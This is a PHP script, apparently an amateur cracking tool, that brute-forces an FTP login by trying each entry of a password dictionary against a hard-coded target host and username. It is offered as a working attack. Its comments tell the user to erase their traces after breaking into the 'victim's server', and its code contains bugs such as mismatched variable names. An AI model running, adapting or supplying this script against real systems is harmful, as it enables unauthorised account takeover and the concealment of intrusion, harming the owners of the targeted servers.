* @URL : http://www.greeknetizen.net/
* @DESCTIPTION:
* This PHP script tries a password
* from the password file each time intil it finds it.
* Execute it from a webpage on your server, not from
* the command line(!). And remember to clear your
* traces if you succeed in cracking the password
* of the FTP account you desire. And once again,
* I am not responsible for any of your actions
* with this code.
*/
error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
set_time_limit(0); // set the time limit for the script to +oo
$passwordfile = "passwd.dic"; //this is the path to the passwordfile
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
$usrname = "bahoosh"; // change this to the username
// of the FTP account you want
// to attack
$interval = 1; // this is the break the script each time it tries a password
// do not set this to zero
//change the second arguments you desire
$crh = "Sorry, the host you specified cannot be retrieved!";
$cc = "Sorry, I cannot connect to $targethost with $username and password: $trypassword
";
/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */
if(!file_exists($passwordfile)) {
die("Sorry, the passwordfile $passwordfile cannot be retrieved");
} else {
// open connection funtion
function openconnection($targethost,$username,$trypassword) {
print "
Trying password $trypassword for ".$username." to $targethost
";
$ftp_conn = @ftp_connect($targethost) or print $crh;
if($ftp_conn) {
$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
if(!$trylogin) {
print $cc;
} else {
print "The password is: $trypassword
";
@ftp_quit($ftp_conn);
break;
}
}
}
//end of function
// try to open the password file
$fp = @fopen($passwordfile,"r");
if(!$fp) {
die("The password file cannot open");
} else {
print "The passwordfile is forked!";
//get the passwords
while($trypassword = @fgets($fp,1024)) {
openconnection($targethost,$usrname,$trypassword);
sleep($interval);
}
}
//...and close the password file or die of errors
@fclose($fp) or die("\n
\nCannot close the password file!\n");
echo "The password file has closed";
}
// when you succeed connecting to your victim's server
// do not forget to delete your traces
?>